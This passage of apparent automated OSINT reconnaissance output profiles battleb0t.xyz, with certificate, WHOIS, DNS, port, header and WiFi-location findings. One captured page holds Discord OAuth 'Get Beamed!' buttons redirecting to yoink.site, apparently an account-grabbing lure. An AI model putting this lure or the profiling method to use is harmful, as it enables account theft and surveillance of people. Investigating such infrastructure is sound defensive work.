68:46:d9:68:ed:ca:a6:15:15:a5:57:56:d1:00:94:
83:4a:61
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
98:BA:3D:0D:C8:59:5C:05:86:25:C6:DE:57:7A:62:02:A8:E1:D5:36
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 23 21:32:58.351 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:F9:02:68:04:DD:BD:03:2E:AE:18:AA:
AF:0D:3B:37:54:0B:65:42:08:02:43:59:39:EA:4E:E4:
74:9E:81:C9:7F:02:21:00:A3:06:40:AE:98:69:3E:CB:
1F:F6:11:FA:78:DC:13:53:6B:E1:77:75:9F:C2:16:A0:
DB:C3:04:86:97:E4:3C:C0
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 23 21:32:58.367 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:7A:A2:EB:6D:CE:11:7A:04:E7:47:C4:C2:
44:9A:BB:45:2B:47:3C:26:06:C5:A4:73:04:05:59:C0:
EA:D7:C9:86:02:21:00:96:12:0C:16:C7:15:09:8E:8E:
23:55:5D:FF:D3:4D:29:B3:21:12:6C:94:18:E0:30:4E:
4A:D0:D6:81:62:80:25
Signature Algorithm: sha256WithRSAEncryption
54:a4:7f:41:90:b7:5a:58:4b:b5:6b:68:ea:db:5a:92:b3:b2:
5b:7b:19:af:8a:ab:f1:af:c0:c8:97:4c:34:bf:3f:32:11:7b:
ef:8b:7e:76:7a:87:16:2c:1f:d0:41:d1:c1:02:b1:37:57:af:
4c:2b:b8:7b:75:a1:66:6d:db:db:ab:82:a1:fd:0c:b1:09:1f:
f6:3b:6f:e4:40:6a:6c:5b:ef:1d:46:ef:b3:b7:e2:09:40:10:
a0:d1:48:3e:99:ab:85:a3:c4:4c:9c:38:4c:86:5d:05:6c:1b:
02:ea:8a:b9:cd:33:f5:2b:4f:92:81:81:2f:e1:d6:b3:a5:e1:
b8:f6:e8:c6:e4:af:f3:a4:96:e9:02:f8:de:c5:31:3b:03:6b:
a3:c1:43:ea:01:84:7b:d7:65:c2:7b:26:5b:45:8b:c9:00:4a:
bf:64:80:db:bc:e4:35:f5:31:8b:1a:49:c1:a9:b6:8d:8f:59:
62:4e:f9:b9:59:d2:7d:9b:3a:75:2f:82:0e:77:1f:fa:cc:3b:
4e:90:c2:ba:e9:1d:4c:b0:a0:53:8e:4b:72:4b:e7:12:e4:36:
5a:97:fc:6e:97:fc:a5:f5:76:de:6f:cd:f5:6d:3f:07:f6:75:
e6:97:55:45:a3:14:55:0c:ff:89:33:2c:76:5f:49:b1:2d:bb:
1e:69:4c:4d
| battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:21:0C:9F) | 37.7642, -122.3993 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f603759cec44a-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:31:27 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | abuse@namecheap.com | Domain Name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com
Updated Date: 2022-10-23T13:11:02.954Z
Creation Date: 2022-09-09T13:47:20.593Z
Registry Expiry Date: 2023-09-09T13:47:20.593Z
Registrar: NAMECHEAP
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Fax: REDACTED FOR PRIVACY
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: wesley.ns.cloudflare.com
Name Server: rachel.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN RDDS Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:16.270Z <<<
For more information on domain status codes, please visit https://icann.org/epp
The WHOIS information provided in this page has been redacted
in compliance with ICANN's Temporary Specification for gTLD
Registration Data.
The data in this record is provided by Uniregistry for informational
purposes only, and it does not guarantee its accuracy. Uniregistry is
authoritative for whois information in top-level domains it operates
under contract with the Internet Corporation for Assigned Names and
Numbers. Whois information from other top-level domains is provided by
a third-party under license to Uniregistry.
This service is intended only for query-based access. By using this
service, you agree that you will use any data presented only for lawful
purposes and that, under no circumstances will you use (a) data
acquired for the purpose of allowing, enabling, or otherwise supporting
the transmission by e-mail, telephone, facsimile or other
communications mechanism of mass unsolicited, commercial advertising
or solicitations to entities other than your existing customers; or
(b) this service to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registrar or any
Registry except as reasonably necessary to register domain names or
modify existing domain name registrations.
Uniregistry reserves the right to modify these terms at any time. By
submitting this query, you agree to abide by this policy. All rights
reserved.
Domain name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-09-09T13:47:20.59Z
Registrar Registration Expiration Date: 2023-09-09T13:47:20.59Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Name Server: rachel.ns.cloudflare.com
Name Server: wesley.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T15:09:16.51Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:03:43 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | vscode.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://vscode.battleb0t.xyz', u'http_status': 521, u'plugins': {u'HTTPServer': {u'string': [u'cloudflare']}, u'Script': {}, u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'Title': {u'string': [u'vscode.battleb0t.xyz | 521: Web server is down']}, u'HTML5': {}, u'UncommonHeaders': {u'string': [u'referrer-policy,cf-ray']}, u'IP': {u'string': [u'104.21.71.14']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}, u'X-UA-Compatible': {u'string': [u'IE=Edge']}}}, {}] |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.228): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:27 | Internet Name | No | URLScan.io | 0 | 0 | 1 | 0 | None | kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:46:03:E4:6F) | 34.0544, -118.244 |
| 2023-05-12 02:55:18 | Netblock Membership | No | Censys | 6 | 0 | 3 | 0 | None | 46.101.128.0/17 | 46.101.229.70 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 3333 1370 (Net ID: 00:0F:CC:6D:BD:34) | 32.8608, -79.9746 |
| 2023-05-12 02:54:21 | Linked URL - Internal | No | Web Spider | 4 | 0 | 4 | 0 | None | http://vscode.battleb0t.xyz/cdn-cgi/styles/main.css | http://vscode.battleb0t.xyz/ |
| 2023-05-12 03:32:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.10:8443 | 188.114.97.0/24 |
| 2023-05-12 03:19:17 | Web Framework | No | Web Framework Identifier | 0 | 0 | 3 | 0 | None | jQuery | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.149): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:35 | Name Server (DNS NS Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | brett.ns.cloudflare.com | ayhu.xyz |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 13335 | 172.67.128.0/20 |
| 2023-05-12 03:33:44 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | mntrRGB XYZ
desc
trXYZ
<mluc
-mluc
3`-O!
6fD`
N@e@8
s$01@H
@jlveI
B4Pic
.E"E3@YB
8RktA
-B09:
FRp.PD
A7e k
`kfZb
A8tSNJ
4j@Q4
H8@I"
`Y@A4
!Ot-T
Hh4@OFx4
@2RIA
.MoFZ
S>J9`
1tjP@
A!<Il
3rInvMB
6flJ$
bPD1T_aAc
_`0Zp
1 QVQ
`MXp<K
M39CvX
JtP5A
wtIXB
-3nB-
rtiC
1@f!X
I.ABD
'`jh
tj!HC
Fyv3/
-ApI
99pfaHF
/jMql
5Oy@8U2Q9
Mpi.`
y5_@.
sTiQJ
4Qfqml
wc7nAS
3fti0
w2MrS
?O`OU
E7-B/
PQj@fQod
'ASM6
'aC_@
>JkA8
ks< j
nP?2P
5z'0i
ALQxL
`-DJE
-HqnK
LSq a
S`j68
sV\0i7
IIA4K/
a/L K
R3E5H
$ii/aD<V
@9qEkj
fdcK-
k\p/
e<@E7
TPkZAY
o@i>K
IT 'v
Ip@>u
9x:'F
A/e7h
vj/a1
BnMLh
rJMD\
$5eiS r
@k<rPfcnM
nTqD
8JMKu
-h eo
6OCil-
NdZs>J
H yZ4
eKvkJ
MDA8n
A8mJ'
jTO!D
wPKqV | https://pics.battleb0t.xyz/images/fredo.PNG |
| 2023-05-12 03:01:01 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.106): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cloudflare.com | leanna.ns.cloudflare.com |
| 2023-05-12 02:50:26 | Physical Address | No | GLEIF | 0 | 0 | 3 | 0 | None | C/O REGISTERED AGENT SOLUTIONS, INC., 838 Walker Road Suite 21-2, DOVER, US-DE, US, 19904 | Cloudflare\, Inc. |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WHLee (Net ID: 00:01:21:30:54:A3) | 41.8781, -87.6298 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 104.21.6.166 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WHLee (Net ID: 00:01:21:30:54:A4) | 41.8781, -87.6298 |
| 2023-05-12 03:00:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.51): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:44 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 3 | 0 | None | Google Analytics | vscode.battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | spacebunny (Net ID: 00:11:50:23:B8:1D) | 50.8897, 6.0563 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.91): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:05 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.110 | 87.248.157.102 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | vgf2002noxx (Net ID: 00:02:2D:74:6E:AA) | 50.1188, 8.6843 |
| 2023-05-12 03:23:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.5:80 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | lobste.rs (Category: tech)
https://lobste.rs/u/login | login |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.6.166 |
| 2023-05-12 03:18:53 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 180 @ 18} | https://funny.battleb0t.xyz/images/reveloder.jpg |
| 2023-05-12 02:54:18 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | nwapi.battleb0t.xyz |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | pureftpd | 87.248.157.102 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Project management software | battleb0t.github.io |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0000-bigtree.github.io]
https://www.openphish.com/feed.txt | 0000-bigtree.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | W4B3P]]00S210)>&01/54&6/%&_&'_Pa (Net ID: 00:06:66:23:00:BA) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ifunny (Category: misc)
https://ifunny.co/user/login | login |
| 2023-05-12 02:44:17 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.111.153 |
| 2023-05-12 02:53:32 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 185.199.111.153 |
| 2023-05-12 03:03:37 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00why00.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 000.dontkillmyapp.com | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EE:55:AC) | 41.8781, -87.6298 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
x-powered-by: PHP/7.4.33
content-type: text/html; charset=UTF-8
link: <https://acilacikveteriner.com/wp-json/>; rel="https://api.w.org/"
transfer-encoding: chunked
content-encoding: gzip
vary: Accept-Encoding
date: <REDACTED>
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
| 87.248.157.102 |
| 2023-05-12 02:47:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.111.153:80 | 185.199.111.153 |
